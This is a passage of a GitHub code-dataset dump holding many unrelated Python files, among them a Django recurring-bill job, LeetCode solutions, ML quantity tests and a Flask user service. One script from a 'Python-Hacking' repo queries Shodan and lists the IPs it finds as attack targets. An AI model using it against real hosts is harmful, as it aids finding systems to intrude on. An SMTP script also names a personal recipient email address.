= pd.read_csv(path)\n self.df = self.df.rename(columns={'entry term': 'heading'})\n self.df = self.df[self.df['heading'].notnull()]\n self.df['path'] = self.df['URI'].apply(lambda uri: re.sub(r'^.*/main/', '', uri))\n self.df['domain'] = self.df['domain'].apply(lambda domain: re.sub(r'\\W+', '_', domain.lower().strip()))\n\n def add_custom_samples(self):\n samples = pd.DataFrame(settings.CUSTOM_SAMPLES)\n self.df = pd.concat([self.df, samples], ignore_index=True)\n\n def get_all(self):\n return [row for i, row in self.df.iterrows()]\n\n @classmethod\n def read_all(cls):\n samples = cls()\n samples.load()\n samples.add_custom_samples()\n return samples.get_all()\n\n","repo_name":"kingsdigitallab/eb-pre","sub_path":"helpers/samples.py","file_name":"samples.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"73650752448","text":"from typing import List\n\nfrom django.utils import timezone\n\nfrom .. import models\n\n\"\"\"\nOut of date\n\"\"\"\n\n\ndef get_recurring_bill_today() -> List[models.Transaction]:\n \"\"\"\n For yearly bill, check if today is the month/day\n For monthly bill, check if today is the x-th day\n \"\"\"\n # Get today's month and day\n today = timezone.localdate()\n month, day = today.month, today.day\n\n bill_all = models.RecurringBill.objects.all()\n bill_year = bill_all.filter(frequency='Y')\n bill_month = bill_all.filter(frequency='M')\n\n bill_today = []\n # For yearly bill\n bill_today += bill_year.filter(recurring_month=month, recurring_day=day)\n\n # For monthly bill\n bill_today += bill_month.filter(recurring_day=day)\n\n return bill_today\n\n\ndef create_recurring_bill_today() -> None:\n \"\"\"\n Run at each day 5:00 am\n \"\"\"\n bills = get_recurring_bill_today()\n\n # Create new instance for these bills\n for bill in bills:\n models.Transaction.objects.create(\n amount=bill.amount,\n category=bill.category,\n company=bill.company,\n card=bill.card,\n creator=bill,\n note=bill.note,\n skip_summary_flag=bill.skip_summary_flag\n )\n","repo_name":"asvrada/home-dashboard-backend","sub_path":"backend/crontab/recurring.py","file_name":"recurring.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34287378593","text":"from shodan import Shodan\r\nimport argparse\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('-q','--query',help=\"Busqueda\")\r\nparser.add_argument('-a','--api',help=\"Tu api\")\r\nparser = parser.parse_args()\r\n\r\ndef main():\r\n\tif parser.query:\r\n\t\t\r\n\t\tif parser.api:\r\n\t\t\t\r\n\t\t\tapi = Shodan(parser.api)\r\n\r\n\t\t\ttry:\r\n\t\t\t\tb = api.search(parser.query)\r\n\t\t\t\tprint(\"Total de objetivos: {}\".format(b['total']))\r\n\t\t\t\tfor i in b['matches']:\r\n\t\t\t\t\tprint(\"Target encontrado: {}\".format(i['ip_str']))\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Error en la consulta\")\r\n\t\telse:\r\n\t\t\tprint(\"Introduce tu api key\")\r\n\r\n\telse:\r\n\t\tprint(\"Introduce un caractar de Busqueda\")\r\n\r\nif __name__ == '__main__':\r\n\ttry:\r\n\t\tmain()\r\n\texcept KeyboardInterrupt:\r\n\t\texit()","repo_name":"Albertpilaestrada/Python-Hacking","sub_path":"shoodan3.py","file_name":"shoodan3.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"19005943168","text":"class Solution:\n\n def climbStairs(self, n: int) -> int:\n return self.process(0, n, 0, {})\n\n \n def process(self, ci, n, ans, memo):\n if ci == n:\n return ans+1\n if ci > n:\n return ans\n \n currentKey = ci\n if currentKey in memo:\n return memo[currentKey]\n \n oneJump = self.process(ci+1, n, ans, memo)\n twoJump = self.process(ci+2, n, ans, memo)\n ans = oneJump + twoJump\n memo[currentKey]=ans\n return ans","repo_name":"brax-gunn/DSA_SWAGWALA_DEVELOPER","sub_path":"DYNAMIC PROGRAMMING/01_Climbing_Stairs.py","file_name":"01_Climbing_Stairs.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26084893278","text":"from Drone import Drone\n\n\nclass Leader(Drone):\n def __init__(self, name, sim_object):\n super(Leader).__init__(name, sim_object)\n\n def move_target(self, target_pose):\n start_pose_target = self.get_position(self.target_object)\n self.sim.moveToPose(-1, start_pose_target, [self.max_velocity], [self.max_acceleration], [self.max_jerking],\n target_pose,\n self.cb,\n self.target_object,\n [1, 1, 1, 0.1])\n","repo_name":"KetrinXD/HIVE-DL","sub_path":"classes/Leader.py","file_name":"Leader.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26886257729","text":"import smtplib\n\nuser = \"\"\npw = \"\"\nhost = \"email-smtp.us-west-2.amazonaws.com\"\nport = 587\nme = \"medusa@sebbqld.com\"\nyou = (\"christopher.vasiliou@schneider-electric.com\",)\nbody = \"The gorgon Medusa has risen!! \\n Stare into my eyes!\"\nmsg = (\"From: %s\\r\\nTo: %s\\r\\n\\r\\n\" % (me, \", \".join(you)))\nmsg = msg + body\ns = smtplib.SMTP(host, port, timeout = 10)\ns.starttls()\ns.login(user, pw)\ns.sendmail(me, you, msg)\ns.quit()\n","repo_name":"SEBA-Smart-Services/medusa-sbo","sub_path":"app/email/sendEmail.py","file_name":"sendEmail.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32117175326","text":"\"\"\"Tests for `cockpit.quantities.early_stopping`.\"\"\"\n\nimport pytest\n\nfrom backpack import extensions\nfrom cockpit.context import get_batch_size\nfrom cockpit.quantities import CABS\nfrom tests.test_quantities.utils import compare_quantities, get_output_sgd_test_runner\n\nTESTPROBLEMS = [\n \"quadratic_deep\",\n \"mnist_logreg\",\n # \"fmnist_2c2d\",\n \"mnist_mlp\",\n \"fmnist_logreg\",\n \"fmnist_mlp\",\n # \"mnist_2c2d\",\n \"cifar10_3c3d\",\n]\n\nTRACK_INTERVAL = 2\n\n\nclass CABSExpensive(CABS):\n \"\"\"CABS rule from individual gradients.\"\"\"\n\n def extensions(self, global_step):\n \"\"\"Return list of BackPACK extensions required for the computation.\n\n Args:\n global_step (int): The current iteration number.\n\n Returns:\n list: (Potentially empty) list with required BackPACK quantities.\n \"\"\"\n ext = []\n if self.is_active(global_step):\n ext.append(extensions.BatchGrad())\n\n return ext\n\n def _compute(self, global_step, params, batch_loss):\n \"\"\"Compute the CABS rule. Return suggested batch size.\n\n Evaluates Equ. 22 of\n\n - Balles, L., Romero, J., & Hennig, P.,\n Coupling adaptive batch sizes with learning rates (2017).\n \"\"\"\n B = get_batch_size(global_step)\n\n grad_squared = self._fetch_grad(params, aggregate=True) ** 2\n # # compensate BackPACK's 1/B scaling\n batch_grad_compensated = B * self._fetch_batch_grad(params, aggregate=True)\n\n sgs = (batch_grad_compensated ** 2).sum()\n ssg = grad_squared.sum()\n\n return self._lr * (sgs - B * ssg) / (B * batch_loss.item())\n\n\n@pytest.mark.parametrize(\"testproblem\", TESTPROBLEMS, ids=TESTPROBLEMS)\ndef test_integration(\n testproblem, num_epochs=1, batch_size=4, lr=0.01, momentum=0.0, seed=0\n):\n \"\"\"Integration test for early stopping quantity.\n\n Note: This test only verifies that the computation passes.\n \"\"\"\n quantities = [CABS(TRACK_INTERVAL, verbose=True)]\n\n return get_output_sgd_test_runner(\n quantities,\n testproblem,\n num_epochs=num_epochs,\n batch_size=batch_size,\n lr=lr,\n momentum=momentum,\n seed=seed,\n )[0]\n\n\n@pytest.mark.parametrize(\"testproblem\", TESTPROBLEMS, ids=TESTPROBLEMS)\ndef test_expensive_matches_separate_runs(\n testproblem, num_epochs=1, batch_size=4, lr=0.01, momentum=0.0, seed=0\n):\n \"\"\"Compare with expensive early stopping criterion. Perform two runs.\"\"\"\n quantity1 = CABS(TRACK_INTERVAL, verbose=True)\n quantity2 = CABSExpensive(TRACK_INTERVAL, verbose=True)\n\n compare_quantities(\n [quantity1, quantity2],\n testproblem,\n separate_runs=True,\n num_epochs=num_epochs,\n batch_size=batch_size,\n lr=lr,\n momentum=momentum,\n seed=seed,\n )\n\n\n@pytest.mark.parametrize(\"testproblem\", TESTPROBLEMS, ids=TESTPROBLEMS)\ndef test_expensive_matches_joint_runs(\n testproblem, num_epochs=1, batch_size=4, lr=0.01, momentum=0.0, seed=0\n):\n \"\"\"Compare with expensive early stopping criterion. Perform one run.\"\"\"\n quantities = [\n CABS(TRACK_INTERVAL, verbose=True),\n CABSExpensive(TRACK_INTERVAL, verbose=True),\n ]\n\n compare_quantities(\n quantities,\n testproblem,\n separate_runs=False,\n num_epochs=num_epochs,\n batch_size=batch_size,\n lr=lr,\n momentum=momentum,\n seed=seed,\n )\n","repo_name":"ahthie7u/cockpit","sub_path":"tests/test_quantities/test_cabs.py","file_name":"test_cabs.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"43"} +{"seq_id":"36232302275","text":"# 1. оформить функциями поиск в списке\n# имя, фамилия\n# возраст\n# количество музыкальных посещений\n# количество часов прибываня в центре\n# количество танцевальных посещений\n\npeoples_list = [['Степан Марков', 8, 12, 63, 10], ['Света Беляева', 7, 5, 56, 13], ['Наталья Петрова', 9, 6, 25, 16]]\nvisitors_list = [['Степан Марков', 8, 12, 63, 10], ['Света Беляева', 7, 5, 56, 13], ['Наталья Петрова', 9, 6, 25, 16]]\nprint(peoples_list)\n\n\n# поиск максимального количества часов посещений в списке\ndef find_max_visit(a):\n max_visit = 0\n for people in a:\n if people[3] > max_visit:\n max_visit = people[3]\n return max_visit\n\n# максимальное посещения тантев\ndef find_max_dance(a):\n max_dance = 0\n for people in a:\n if (people[4] > max_dance):\n max_dance = people[4]\n return max_dance\n\n\n# поиск минимального посещения танцев\ndef find_min_dance(a):\n min_dance = peoples_list[0][4]\n for people in a:\n if (people[4] < min_dance):\n min_dance = people[4]\n return min_dance\n\n\n\n# минимальный возраст\ndef find_min_age(z):\n min_age = 100\n for people in z:\n if (people[1] < min_age):\n min_age = people[1]\n return min_age\n\nx = find_max_visit(peoples_list)\nprint(\"максимальное количества часов посещений\",x)\n\nx = find_max_dance(peoples_list)\nprint('максимальное количество часов посещений танцев', x)\n\nx = find_min_dance(peoples_list)\nprint('минимальное посещения танцев', x)\n\nx = find_min_age(peoples_list)\nprint('минимальный возраст',x )","repo_name":"alexandrperm/python-task","sub_path":"задание 5.1.py","file_name":"задание 5.1.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14283914476","text":"__company__ = 'Boulder Environmental Sciences and Technology'\n__project__ = ''\n__author__ = 'Y. Shao'\n__created__ = '2/24/2015' '1:44 PM'\n\n\ndef find_idx():\n \"\"\n\nlidx=find_idx(st_ind,end_ind)\ncompress\nsorted(lidx,key=name)\nfname=fidx[0]\nfor f in lidx:\n fname=f\n zip=compress(f)\n\n save_archive(zip)\n\n upload\n fetch_archive(zip)\n\n\ndef compress(lf):\n \"\"\n\ndef decompress(lf):\n \"\"\n\ndef get_ind(st_ind,end_ind):\n \"\"\n\n\ndef fetch_archive():\n\n larc=sorted(larc,key=name)\n larc=find_range(larc)\n\n fetch(larc)\n decompress(larc)\n\n\nif __name__ == '__main__':\n \"\"\n","repo_name":"yshao/weathergit","sub_path":"031215/fileutils.py","file_name":"fileutils.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71778793729","text":"import tkinter as tk\r\nt=tk.Tk()\r\nt.title('my home')\r\nt.geometry('200x100')\r\n\r\n\r\n\r\nvar=tk.StringVar()\r\nl=tk.Label(t,text=var,bg='green',font=('Arial',12),width=15,height=2)\r\nl.pack()\r\n\r\n\r\non_hit=False\r\nbutton1 = tk.Button(t)\r\nbutton1[\"text\"]= \"Hello, World!\"\r\nbutton1[\"background\"] = \"green\"\r\nbutton1.pack()\r\ndef hit_me():\r\n global on_hit\r\n if on_hit == False:\r\n var.set('you hit me!')\r\n on_hit=True\r\n else:\r\n on_hit=False\r\n var.set('')\r\nb=tk.Button(t,text='hit me',width=15,height=2,command=hit_me)\r\nb.pack()\r\nt.mainloop()\r\n","repo_name":"zhoujun-star/Learning-diary","sub_path":"1.Label&Button(标签和按钮).py","file_name":"1.Label&Button(标签和按钮).py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35014539394","text":"__author__ = 'geurt'\n\n\nclass serialMessageException(Exception):\n pass\n\nclass serialMessageType:\n ENQ, ACK, NAK = range(3)\n\nclass serialMessageSign:\n POSITIVE, NEGATIVE = range(2)\n\nclass serialMsg(object):\n def __init__(self, FromAdress=None, ToAdress=None, Function=None, MsgType=serialMessageType.ENQ):\n self._FromAdress = None # drie posities 001 - 999\n self._ToAdress = None # drie posities 001 - 999\n self._MsgType = MsgType # ENQ, ACK, NAK\n self._Function = None # twee posities 01 - 99\n self._Sign = serialMessageSign.POSITIVE\n self._DecPos = 3 # 0x30 (0 dus alles is 0.123), 0x31 (dus 1.23), 0x32 (dus 12.3), 0x33 (dus 123) 48 of 49 of 50\n self._MsgValue = None # drie posities 000 - 999\n self._IsValid = False\n if FromAdress is not None:\n self.FromAdress = FromAdress\n if ToAdress is not None:\n self.ToAdress = ToAdress\n if Function is not None:\n self.Function = Function\n # comm details\n self._SendTime = 0\n self._Trys = 0\n\n def serialMsgFromString(self, sString):\n if len(sString) >= 19:\n sReadChecksum = sString[16:19]\n iReadChecksum = int(sReadChecksum)\n # calculate iChecksum\n iCalculatedChecksum = 0\n iPos = 0\n for cChar in sString:\n iCalculatedChecksum += ord(cChar)\n iPos += 1\n if iPos == 16:\n break\n if iCalculatedChecksum != iReadChecksum:\n raise serialMessageException(\"Invalid message: checksum mismatch\")\n else:\n self._ToAdress = sString[1:4]\n self._FromAdress = sString[4:7]\n sMsgType = sString[7:8]\n #if sMsgType=='\u0005':\n if ord(sMsgType) == 5:\n self._MsgType = serialMessageType.ENQ\n elif ord(sMsgType) == 6:\n self._MsgType = serialMessageType.ACK\n elif ord(sMsgType) == 21:\n self._MsgType = serialMessageType.NAK\n self._Function = sString[8:10]\n sSign = sString[10:11]\n if sSign == \"-\":\n self._Sign = serialMessageSign.NEGATIVE\n else:\n self._Sign = serialMessageSign.POSITIVE\n self._DecPos = sString[11:12]\n self._MsgValue = sString[12:15]\n self._IsValid = True\n\n def serialMsgToString(self):\n sTmp = chr(0x0)\n if self._ToAdress is not None:\n sTmp += str(self._ToAdress)\n else:\n sTmp += \"000\"\n if self._FromAdress is not None:\n sTmp += str(self._FromAdress)\n else:\n sTmp += \"000\"\n if self._MsgType == serialMessageType.ENQ:\n sTmp += chr(0x05)\n elif self._MsgType == serialMessageType.ACK:\n sTmp += chr(0x06)\n elif self._MsgType == serialMessageType.NAK:\n sTmp += chr(0x15)\n if self._Function is not None:\n sTmp += str(self._Function)\n else:\n sTmp += \"00\"\n if self._Sign == serialMessageSign.POSITIVE:\n sTmp += \"+\"\n else:\n sTmp += \"-\"\n if self._DecPos is not None:\n sTmp += str(self._DecPos)\n else:\n sTmp += \"3\"\n if self._MsgValue is not None:\n sTmp += str(self._MsgValue)\n else:\n sTmp += \"000\"\n sTmp += chr(0x04) # EOT\n\n iChecksum = 0\n for cChar in sTmp:\n iChecksum += ord(cChar)\n sTmp += str(iChecksum)\n sTmp += chr(0x04) # EOT\n return sTmp #TODO, check geen laatste EOT?\n\n # FromAdress\n @property\n def FromAdress(self):\n return self._FromAdress\n\n @FromAdress.setter\n def FromAdress(self, value):\n self._FromAdress = \"%03d\" % (value,)\n\n # ToAdress\n @property\n def ToAdress(self):\n return self._ToAdress\n\n @ToAdress.setter\n def ToAdress(self, value):\n self._ToAdress = \"%03d\" % (value,)\n\n # MsgType\n @property\n def MsgType(self):\n return self._MsgType\n\n @MsgType.setter\n def MsgType(self, value):\n self._MsgType = value\n\n # Function\n @property\n def Function(self):\n return self._Function\n\n @Function.setter\n def Function(self, value):\n self._Function = \"%02d\" % (value,)\n\n # Sign\n @property\n def Sign(self):\n return self._Sign\n\n @Sign.setter\n def Sign(self, value):\n self._Sign = value\n\n # DecPos\n @property\n def DecPos(self):\n return self._DecPos\n\n @DecPos.setter\n def DecPos(self, value):\n self._DecPos = value\n\n # MsgValue\n @property\n def MsgValue(self):\n return self._MsgValue\n\n @MsgValue.setter\n def MsgValue(self, value):\n if isinstance( value, ( int, long ) ):\n self._MsgValue = \"%03d\" % (value,)\n else:\n self._MsgValue = value\n\n # IsValid\n @property\n def IsValid(self):\n return self._IsValid\n\n @IsValid.setter\n def IsValid(self, value):\n self._IsValid = value\n\n # SendTime\n @property\n def SendTime(self):\n return self._SendTime\n\n @SendTime.setter\n def SendTime(self, value):\n self._SendTime = value\n\n # _Retrys\n @property\n def Trys(self):\n return self._Trys\n\n @Trys.setter\n def Trys(self, value):\n self._Trys = value","repo_name":"geurtlagemaat/bliknetlib","sub_path":"src/bliknetlib/serialMsg.py","file_name":"serialMsg.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"31298129418","text":"from collections import deque\n\ndef isThereBig(que, n):\n for q in que:\n k, v = q[0], q[1]\n if n < v:\n return True\n \n return False\n\ndef solution(priorities, location):\n answer = []\n queue = deque()\n idx = 0\n for p in priorities:\n queue.append([idx, p])\n idx += 1\n\n while queue:\n front = queue.popleft()\n\n if isThereBig(queue, front[1]):\n queue.append(front)\n else:\n answer.append(front)\n\n for i, ans in enumerate(answer):\n k, v = ans[0], ans[1]\n if k == location:\n return i+1\n\nprior = [1, 1, 9, 1, 1, 1]\nloc = 0\ns = solution(prior, loc)\nprint(s)","repo_name":"star6973/algorithm-practice","sub_path":"Programmers/solved/프린터.py","file_name":"프린터.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"38388143713","text":"'''\nCreated on Apr 24, 2019\n\n@author: PITA\n'''\nfrom Package import GetInput, Retea\nimport numpy\nlimita = 0.5\ndef tipareste(x):\n lst=[]\n for it in range(len(x)):\n for jt in range(len(x[it])):\n if x[it][jt] not in lst:\n lst.append(x[it][jt])\n lst.sort()\n print(lst) \ndef analizeazaPoza(poza):\n import cv2\n pixeli = GetInput.prelucreazaImagineInput(poza)\n image = cv2.imread(poza)\n model = Retea.getModel()\n pred = model.predict(numpy.array([pixeli]))\n suma = 0\n cnt = 0\n for it in range(len(pred[0])):\n \n for jt in range(len(pred[0][it])):\n \n if pred[0][it][jt]>limita:\n suma +=pred[0][it][jt]\n cnt +=1\n medie = (float(suma)/float(cnt))\n for it in range(len(pred[0])):\n for jt in range(len(pred[0][it])):\n if pred[0][it][jt]>medie: \n cv2.circle(image,(it*4,jt*4), 3, (0,0,255), -1)\n tipareste(pred)\n cv2.imshow(\"IataCarii\", image)\n cv2.waitKey(0)\n print(medie)\n print(pred.shape)\n print(pred)\n \n \n#analizeazaPoza(r\"C:\\Users\\PITA\\git\\licenta2019\\Radiografii_DB\\PHOTO-2019-04-24-14-12-50.jpg\")","repo_name":"nCiss/licenta2019","sub_path":"licenta2019/Package/MainScript.py","file_name":"MainScript.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"73405398849","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n \n \n \n def addTwoNumbers(self, l1, l2):\n \n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n first_sum = self.get_sum(l1)\n second_sum = self.get_sum(l2)\n total = first_sum + second_sum\n root = ListNode(0)\n dummy_front = root\n sum =0\n \n while total >=10:\n last_digit = sum %((sum/10) *10)\n dummy_front.next = ListNode(last_digit)\n sum = sum/10\n dummy_front = dummy_front.next\n dummy_front.next =ListNode(sum)\n return root.next\n \n def get_sum(self, listNode):\n sum =0\n pos =1\n listNode = listNode.next\n while listNode:\n sum +=pos*listNode.val\n pos *= 10\n return sum\n\n\n \n \n","repo_name":"Ashok96/LeetCodeProblem2","sub_path":"leetcod2(timelimit).py","file_name":"leetcod2(timelimit).py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11303311088","text":"import platform\nimport os\nimport cogs.hs.setuplangs\n\nbrewinstallmacos = \"\"\"/usr/bin/ruby -e \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)\" && \"\"\"\npresetregmacos = \"pip3 install discord.py[voice]\"\npresetoptmacos = \" && brew install ffmpeg\"\n\npresetoptlinux = \" && sudo apt-get install libopus0 && sudo apt-get install ffmpeg\"\npresetreglinux = \"pip3 install discord.py[voice] && sudo apt-get install libffi-devel\"\n\npresetregwindows = \"pip3 install discord.py[voice]\"\n\n\n\n\nprint(\"Setup-Script shipped with JeffNationBot. Installs all dependencies and sets up python for an easy start.\\n PLEASE PROVIDE CREDIT WITHIN THE HELP PAGE WITH AN LINK TO OUR GITHUB REPO!\")\nos = platform.system()\n\nprint(\"What language do you want to use?/Welche Sprache möchtest du nutzen?\\n0: English, 1: Deutsch\")\nchoice1 = input(\"Select Language: \")\nchoice1 = int(choice1)\n\nif choice1>1:\n print(\"Wrong language configured! Assuming english...\")\n choice1=0\n\nprint(cogs.hs.setuplangs.welcome1[choice1])\nprint(cogs.hs.setuplangs.welcome2[choice1])\nif os==\"Linux\":\n print(cogs.hs.setuplangs.detect[choice1].format(\"Linux\"))\n det = 1\nelif os==\"Darwin\":\n print(cogs.hs.setuplangs.detect[choice1].format(\"MacOS\"))\n det = 2\nelif os==\"Windows\":\n print(cogs.hs.setuplangs.detect[choice1].format(\"Windows\"))\n det = 3\n\n\ndef Linux():\n print(cogs.hs.setuplangs.dtlinux[choice1])\n installation = input(cogs.hs.setuplangs.dtaccept[choice1])\n installation = int(installation)\n if installation == 0 or installation > 3:\n print(\"Out of range!\")\n exit(2)\n else:\n if installation == 1:\n output = presetreglinux + presetoptlinux\n elif installation == 2:\n output = presetreglinux\n elif installation == 3:\n print(\"Aborted by user!\")\n exit(0)\n\n print(\"-----------------------------------\")\n print(output)\n print(\"-----------------------------------\\n\", cogs.hs.setuplangs.copypaste[choice1],\n \"\\n-----------------------------------\")\n done = input(cogs.hs.setuplangs.executesucc[choice1])\n\n if done == \"y\":\n print(cogs.hs.setuplangs.grttoken[choice1])\n tokengen()\n if done == \"n\":\n print(cogs.hs.setuplangs.commanderror[choice1])\n else:\n print(\"Invalid input!\")\n exit(1)\n\n\ndef MacOS():\n macbrew = input(cogs.hs.setuplangs.dtmacospre[choice1] + \" \")\n if macbrew==\"y\":\n mcbr = 0\n elif macbrew==\"n\":\n mcbr = 1\n else:\n print(\"Illegal input!\")\n exit(1)\n\n print(cogs.hs.setuplangs.dtmacos[choice1])\n installation = input(cogs.hs.setuplangs.dtaccept[choice1])\n installation = int(installation)\n if installation==0 or installation>3:\n print(\"Out of range!\")\n exit(2)\n else:\n if installation==1:\n output = presetregmacos + presetoptmacos\n elif installation==2:\n output = presetregmacos\n elif installation==3:\n print(\"Aborted by user!\")\n exit(0)\n\n if mcbr==1:\n output = brewinstallmacos + output\n else:\n output = output\n print(\"-----------------------------------\")\n print(output)\n print(\"-----------------------------------\\n\", cogs.hs.setuplangs.copypaste[choice1], \"\\n-----------------------------------\")\n done = input(cogs.hs.setuplangs.executesucc[choice1])\n\n if done==\"y\":\n print(cogs.hs.setuplangs.grttoken[choice1])\n tokengen()\n if done==\"n\":\n print(cogs.hs.setuplangs.commanderror[choice1])\n else:\n print(\"Invalid input!\")\n exit(1)\n\n\n\n\n\ndef Windows():\n print(cogs.hs.setuplangs.dtlinux[choice1])\n installation = input(cogs.hs.setuplangs.dtaccept[choice1])\n installation = int(installation)\n if installation == 0 or installation > 3:\n print(\"Out of range!\")\n exit(2)\n else:\n if installation == 1:\n input(cogs.hs.setuplangs.windowsffmpeg[choice1])\n output = presetregwindows\n elif installation == 2:\n output = presetreglinux\n elif installation == 3:\n print(\"Aborted by user!\")\n exit(0)\n\n print(\"-----------------------------------\")\n print(output)\n print(\"-----------------------------------\\n\", cogs.hs.setuplangs.copypaste[choice1],\n \"\\n-----------------------------------\")\n done = input(cogs.hs.setuplangs.executesucc[choice1])\n\n if done == \"y\":\n print(cogs.hs.setuplangs.grttoken[choice1])\n tokengen()\n if done == \"n\":\n print(cogs.hs.setuplangs.commanderror[choice1])\n else:\n print(\"Invalid input!\")\n exit(1)\n\n\ndef tokengen():\n print(cogs.hs.setuplangs.entertoken[choice1])\n token = input()\n print(cogs.hs.setuplangs.createfile[choice1])\n f = open('modules/token.py', 'w')\n f.write(\"\"\"def gettoken():\\n token = \"{}\"\\n return token\"\"\".format(token))\n f.close()\n print(cogs.hs.setuplangs.done[choice1])\n print(cogs.hs.setuplangs.runb[choice1], \"\\n python3 main.py\")\n exit(10)\n\n\nif det==1:\n Linux()\nelif det==2:\n MacOS()\nelif det==3:\n Windows()\n","repo_name":"p8tgames/jeffnation-bot.py","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"41331724598","text":"from flask import current_app, jsonify\nfrom flask_jwt_extended import create_access_token, get_current_user\nimport requests\nfrom app.main.models.user import User, FollowerRelationship\nfrom app.main.models.poll import Poll\nfrom app.main import db\n\ndef save_new_user(data):\n try:\n access_token = data['accessToken']\n\n debug_token_request = requests.get(\n current_app.config['DEBUG_TOKEN_URL'].format(access_token=access_token))\n\n debug_token_json = debug_token_request.json()\n user_id = debug_token_json['data']['user_id']\n\n user = User.query.filter_by(fb_id=user_id).first()\n # if user exists, just return new JWT\n if user:\n jwt = create_access_token(user.id, expires_delta=False)\n return dict(token=jwt), 201\n\n user_details_request = requests.get(\n url=current_app.config['USER_DETAIL_URL'].format(access_token=access_token, user_id=user_id)\n )\n\n user_detail_json = user_details_request.json()\n\n name = user_detail_json['name']\n email = None if 'email' not in user_detail_json else user_detail_json['email']\n fb_id = user_detail_json['id']\n\n user = User(fb_id=fb_id, name=name, email=email)\n\n db.session.add(user)\n db.session.commit()\n\n jwt = create_access_token(user.id)\n return dict(token=jwt, expires_delta=False), 201\n\n except Exception as e:\n raise ValueError(e)\n response_object = {\n 'status': 'error',\n 'message': 'Internal Error'\n }\n\n return response_object, 500\n\ndef get_all_users():\n user = get_current_user()\n users_and_relationship = db.session \\\n .query(User.id, User.email, User.name, User.fb_id, FollowerRelationship.relationship_status) \\\n .outerjoin(FollowerRelationship, FollowerRelationship.follower_id == User.id) \\\n .filter(User.id != user.id) \\\n .all()\n\n return [u._asdict() for u in users_and_relationship], 200\n\ndef create_user_follow_request(data):\n user_requested_id = data['id']\n\n current_user = get_current_user()\n user_to_request = User.query.filter_by(id=user_requested_id).first()\n\n current_user.followers.append(user_to_request)\n db.session.add(current_user)\n db.session.commit()\n\n response_object = {\n 'status': 'success'\n }\n\n return response_object, 201\n\ndef confirm_user_follow_request(data):\n following_id = data['id']\n current_user = get_current_user()\n\n follow_request = db.session.query(FollowerRelationship) \\\n .filter_by(user_id=following_id, follower_id=current_user.id).first()\n\n follow_request.relationship_status = \"accepted\"\n db.session.add(follow_request)\n\n polls_following = Poll.query.filter_by(owner_id=following_id).all()\n user = User.query.filter_by(id=current_user.id).first()\n user.polls_following.extend(polls_following)\n db.session.add(user)\n\n db.session.commit()\n\n response_object = {\n 'status': 'success'\n }\n\n return response_object, 201\n\ndef get_a_user(public_id):\n user = db.session.query(User.id, User.email, User.fb_id, User.name) \\\n .filter(User.id == public_id) \\\n .first()\n response = user._asdict()\n return response, 200\n\ndef get_user_subscribers():\n current_user = get_current_user()\n #right now just getting followers name and id\n mysubscribers = db.session.query(User.name, FollowerRelationship.follower_id )\\\n .outerjoin(FollowerRelationship,FollowerRelationship.follower_id == User.id)\\\n .filter(FollowerRelationship.user_id == current_user.id)\\\n .filter(FollowerRelationship.relationship_status == \"accepted\")\\\n .all()\n return [u._asdict() for u in mysubscribers], 200\n\ndef get_user_subscribedto():\n\n current_user = get_current_user()\n\n subscribedto = db.session.query(User.name, FollowerRelationship.user_id )\\\n .outerjoin(FollowerRelationship,FollowerRelationship.user_id == User.id)\\\n .filter(FollowerRelationship.follower_id == current_user.id)\\\n .filter(FollowerRelationship.relationship_status == \"accepted\")\\\n .all()\n return [u._asdict() for u in subscribedto], 200\n\ndef get_invited_by_users(user_id):\n\n invited_by = db.session.query(User.name, FollowerRelationship.user_id )\\\n .outerjoin(FollowerRelationship,FollowerRelationship.user_id == User.id)\\\n .filter(FollowerRelationship.follower_id == user_id)\\\n .filter(FollowerRelationship.relationship_status == \"pending\")\\\n .all()\n return [u._asdict() for u in invited_by], 200\n","repo_name":"JeffreyQ/UCLA-CS-130","sub_path":"backend/app/main/service/user_service.py","file_name":"user_service.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"23814019579","text":"# -*- encoding: utf-8 -*-\n\n# Code greatly inspired 